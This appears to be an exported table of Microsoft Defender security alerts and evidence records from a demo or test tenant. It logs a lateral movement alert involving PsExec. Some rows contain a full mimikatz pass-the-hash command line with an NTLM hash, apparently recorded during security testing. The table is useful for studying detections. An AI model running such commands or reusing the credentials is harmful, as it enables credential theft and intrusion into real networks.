"ipAddress": null,
"parentProcessCreationTime": null,
"parentProcessFileName": null,
"parentProcessFilePath": null,
"parentProcessId": null,
"processCommandLine": null,
"processCreationTime": null,
"processId": null,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "None",
"remediationStatusDetails": null,
"sha1": null,
"sha256": null,
"url": null,
"userPrincipalName": "jeff@msdxv2.m365dpoc.com",
"userSid": "S-1-5-21-2300221942-1987151257-321556088-1104",
"verdict": "Suspicious"
}
] | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null |
null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | User | 2022-12-13T19:22:30.7466667Z | Suspicious | None | guest | msdxv2.m365dpoc | S-1-5-21-2300221942-1987151257-321556088-1110 | 598763ac-48bb-4671-9472-6be219756e33 | darol@msdxv2.m365dpoc.com | null | null | null | null | null | null | null | null | null | null | null | null | null |
null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | User | 2022-11-18T05:11:31.4266667Z | Suspicious | None | alice | msdxv2.m365dpoc | S-1-5-21-2300221942-1987151257-321556088-1104 | e848b07a-87af-4448-9979-09f0b809c8d4 | jeff@msdxv2.m365dpoc.com | null | null | null | null | null | null | null | null | null | null | null | null | null |
null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | User | 2022-12-13T22:00:04.93Z | Suspicious | None | hacker | msdxv2.m365dpoc | S-1-5-21-2300221942-1987151257-321556088-1110 | 598763ac-48bb-4671-9472-6be219756e33 | darol@msdxv2.m365dpoc.com | null | null | null | null | null | null | null | null | null | null | null | null | null |
null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | User | 2022-11-11T08:20:15.4333333Z | Suspicious | None | hacker | msdxv2.m365dpoc | S-1-5-21-2300221942-1987151257-321556088-1104 | e848b07a-87af-4448-9979-09f0b809c8d4 | jeff@msdxv2.m365dpoc.com | null | null | null | null | null | null | null | null | null | null | null | null | null |
da638043451253345303_-1125840922 | d4b18d26-edcc-437b-be48-7d723a86788f | 741 | MicrosoftDefenderForEndpoint | 2022-11-18T05:12:05.3345541Z | 2022-11-19T01:35:46.6533333Z | 2022-11-19T01:35:46.5533333Z | 2022-11-18T05:09:53.1912748Z | 2022-11-18T05:14:15.9874335Z | Suspicious remote activity | Suspicious activity initiated remotely was observed on this machine. This alert can flag attempts to initiate interactive sessions, modify files, pass WMI commands, create scheduled tasks, and other potentially malicious activities from a remote machine. | LateralMovement | Resolved | Medium | 49 | PendingApproval | TruePositive | SecurityTesting | WindowsDefenderAtp | 64e1767d-3cc3-4573-8707-d2892b79c155 | takeshi@msdxv2.m365dpoc.com | null | null | [
"T1021",
"T1105",
"T1543.003",
"T1569.002"
] | [
{
"aadDeviceId": "14b11ffe-5128-4842-bbdf-31f0fbfcb600",
"defenderAvStatus": "Updated",
"deviceDnsName": "rnd.local",
"firstSeen": "2022-08-08T08:29:47.252Z",
"healthStatus": "Active",
"loggedOnUsers": [
{
"accountName": "steve",
"domainName": "MSDXV2"
}
],
"mdatpDeviceId": "36150b3c1b69b5c2da9df4efd86ac6c166924a48",
"onboardingStatus": "Onboarded",
"osBuild": 19043,
"osPlatform": "Windows10",
"osProcessor": "x64",
"rbacGroupName": "Semi Auto Client",
"riskScore": "High",
"tags": [
"semi auto"
],
"version": "21H1",
"vmMetadata": {
"cloudProvider": "Unknown",
"resourceId": "/subscriptions/29e73d07-8740-4164-a257-592a19a7b77c/resourceGroups/MSDXV2/providers/Microsoft.Compute/virtualMachines/MSDXV2-Win10B",
"subscriptionId": "29e73d07-8740-4164-a257-592a19a7b77c",
"vmId": "2f7d6bc4-df6d-4836-becd-aff9cb361b66"
}
}
] | [
{
"aadUserId": "89b6fc86-af84-47b2-a72d-325362598b2c",
"accountName": "ronhd",
"detectionStatus": null,
"deviceId": null,
"domainName": "MSDXV2",
"entityType": "User",
"evidenceCreationTime": "2022-11-18T05:12:05.38Z",
"fileName": null,
"filePath": null,
"ipAddress": null,
"parentProcessCreationTime": null,
"parentProcessFileName": null,
"parentProcessFilePath": null,
"parentProcessId": null,
"processCommandLine": null,
"processCreationTime": null,
"processId": null,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "None",
"remediationStatusDetails": null,
"sha1": null,
"sha256": null,
"url": null,
"userPrincipalName": "ronhd@msdxv2.m365dpoc.com",
"userSid": "S-1-5-21-2300221942-1987151257-321556088-1111",
"verdict": "Suspicious"
},
{
"aadUserId": null,
"accountName": null,
"detectionStatus": null,
"deviceId": null,
"domainName": null,
"entityType": "User",
"evidenceCreationTime": "2022-11-18T05:12:05.38Z",
"fileName": null,
"filePath": null,
"ipAddress": null,
"parentProcessCreationTime": null,
"parentProcessFileName": null,
"parentProcessFilePath": null,
"parentProcessId": null,
"processCommandLine": null,
"processCreationTime": null,
"processId": null,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "None",
"remediationStatusDetails": null,
"sha1": null,
"sha256": null,
"url": null,
"userPrincipalName": null,
"userSid": "S-1-0-0",
"verdict": "Suspicious"
},
{
"aadUserId": null,
"accountName": null,
"detectionStatus": "Detected",
"deviceId": "36150b3c1b69b5c2da9df4efd86ac6c166924a48",
"domainName": null,
"entityType": "File",
"evidenceCreationTime": "2022-11-18T05:12:05.38Z",
"fileName": "PSEXESVC.exe",
"filePath": "C:\\Windows",
"ipAddress": null,
"parentProcessCreationTime": null,
"parentProcessFileName": null,
"parentProcessFilePath": null,
"parentProcessId": null,
"processCommandLine": null,
"processCreationTime": null,
"processId": null,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "NotFound",
"remediationStatusDetails": "The system cannot find the file specified.",
"sha1": "f309b61a8b005b5ce0a3fb58caaa798cfc95f5db",
"sha256": "3c19fee379b4882971834a3d38f3f8b86de560114274375560433778cd505748",
"url": null,
"userPrincipalName": null,
"userSid": null,
"verdict": "Suspicious"
},
{
"aadUserId": null,
"accountName": null,
"detectionStatus": null,
"deviceId": null,
"domainName": null,
"entityType": "Ip",
"evidenceCreationTime": "2022-11-18T05:12:05.38Z",
"fileName": null,
"filePath": null,
"ipAddress": "10.0.0.9",
"parentProcessCreationTime": null,
"parentProcessFileName": null,
"parentProcessFilePath": null,
"parentProcessId": null,
"processCommandLine": null,
"processCreationTime": null,
"processId": null,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "None",
"remediationStatusDetails": null,
"sha1": null,
"sha256": null,
"url": null,
"userPrincipalName": null,
"userSid": null,
"verdict": "Suspicious"
},
{
"aadUserId": null,
"accountName": "SYSTEM",
"detectionStatus": "Detected",
"deviceId": "36150b3c1b69b5c2da9df4efd86ac6c166924a48",
"domainName": "NT AUTHORITY",
"entityType": "Process",
"evidenceCreationTime": "2022-11-18T05:12:05.38Z",
"fileName": "PSEXESVC.exe",
"filePath": "C:\\Windows",
"ipAddress": null,
"parentProcessCreationTime": "2022-11-16T03:32:19.0279725Z",
"parentProcessFileName": "services.exe",
"parentProcessFilePath": "C:\\Windows\\System32",
"parentProcessId": 620,
"processCommandLine": "PSEXESVC.exe",
"processCreationTime": "2022-11-18T05:10:14.6889142Z",
"processId": 8284,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "None",
"remediationStatusDetails": null,
"sha1": "f309b61a8b005b5ce0a3fb58caaa798cfc95f5db",
"sha256": "3c19fee379b4882971834a3d38f3f8b86de560114274375560433778cd505748",
"url": null,
"userPrincipalName": null,
"userSid": "S-1-5-18",
"verdict": "Suspicious"
},
{
"aadUserId": null,
"accountName": "SYSTEM",
"detectionStatus": "Detected",
"deviceId": "36150b3c1b69b5c2da9df4efd86ac6c166924a48",
"domainName": "NT AUTHORITY",
"entityType": "Process",
"evidenceCreationTime": "2022-11-18T05:16:47.02Z",
"fileName": "PSEXESVC.exe",
"filePath": "C:\\Windows",
"ipAddress": null,
"parentProcessCreationTime": "2022-11-16T03:32:19.0279725Z",
"parentProcessFileName": "services.exe",
"parentProcessFilePath": "C:\\Windows\\System32",
"parentProcessId": 620,
"processCommandLine": "PSEXESVC.exe",
"processCreationTime": "2022-11-18T05:14:15.4780441Z",
"processId": 8968,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "None",
"remediationStatusDetails": null,
"sha1": "f309b61a8b005b5ce0a3fb58caaa798cfc95f5db",
"sha256": "3c19fee379b4882971834a3d38f3f8b86de560114274375560433778cd505748",
"url": null,
"userPrincipalName": null,
"userSid": "S-1-5-18",
"verdict": "Suspicious"
}
] | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null |
null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | User | 2022-11-11T08:19:56.9466667Z | Malicious | None | steve | msdxv2.m365dpoc | S-1-5-21-2300221942-1987151257-321556088-1107 | 0808dea1-2ec8-41d2-8e3e-7c18309fab09 | steve@msdxv2.m365dpoc.com | null | null | null | null | null | null | null | null | null | null | null | null | null |
null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | Process | 2022-11-18T05:10:33.7633333Z | Benign | None | jeff | msdxv2.m365dpoc | S-1-5-21-2300221942-1987151257-321556088-1104 | e848b07a-87af-4448-9979-09f0b809c8d4 | jeff@msdxv2.m365dpoc.com | 70df765f554ed7392200422c18776b8992c09231 | 912018ab3c6b16b39ee84f17745ff0c80a33cee241013ec35d0281e40c0658d9 | mimikatz.exe | C:\M365DAttack\Mimikatz\x64 | 6,500 | "mimikatz.exe" privilege::debug "sekurlsa::pth /user:ronhd /ntlm:96def1a633fc6790124d5f8fe21cc72b /domain:msdxv2.m365dpoc.com /run:\"powershell.exe C:\M365DAttack\Get-KRBTicket.ps1\"" exit -Wait | 2022-11-18T05:09:31.2191789Z | 4,976 | 2022-11-18T05:04:12.7150402Z | powershell.exe | C:\Windows\System32\WindowsPowerShell\v1.0 | Detected | c7e147cb0eb3534a4dcea5acb8e61c933713b145 |
null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | User | 2022-11-21T02:05:47.3Z | Suspicious | None | root | msdxv2.m365dpoc | S-1-5-21-2300221942-1987151257-321556088-1104 | e848b07a-87af-4448-9979-09f0b809c8d4 | jeff@msdxv2.m365dpoc.com | null | null | null | null | null | null | null | null | null | null | null | null | null |
null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | Process | 2022-11-18T05:15:31.2733333Z | Suspicious | Active | alice | msdxv2.m365dpoc | S-1-5-21-2300221942-1987151257-321556088-1104 | e848b07a-87af-4448-9979-09f0b809c8d4 | jeff@msdxv2.m365dpoc.com | 70df765f554ed7392200422c18776b8992c09231 | 912018ab3c6b16b39ee84f17745ff0c80a33cee241013ec35d0281e40c0658d9 | mimikatz.exe | C:\M365DAttack\Mimikatz\x64 | 6,500 | "mimikatz.exe" privilege::debug "sekurlsa::pth /user:ronhd /ntlm:96def1a633fc6790124d5f8fe21cc72b /domain:msdxv2.m365dpoc.com /run:\"powershell.exe C:\M365DAttack\Get-KRBTicket.ps1\"" exit -Wait | 2022-11-18T05:09:31.2191789Z | 4,976 | 2022-11-18T05:04:12.7150402Z | powershell.exe | C:\Windows\System32\WindowsPowerShell\v1.0 | Detected | c7e147cb0eb3534a4dcea5acb8e61c933713b145 |
null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | User | 2022-09-30T06:16:02.3033333Z | Suspicious | None | admin | MSDXV2 | S-1-5-21-2300221942-1987151257-321556088-1111 | 89b6fc86-af84-47b2-a72d-325362598b2c | ronhd@msdxv2.m365dpoc.com | null | null | null | null | null | null | null | null | null | null | null | null | null |
null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | User | 2022-12-13T13:27:33.96Z | Unknown | None | darol | msdxv2.m365dpoc | S-1-5-21-2300221942-1987151257-321556088-1110 | 598763ac-48bb-4671-9472-6be219756e33 | darol@msdxv2.m365dpoc.com | null | null | null | null | null | null | null | null | null | null | null | null | null |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.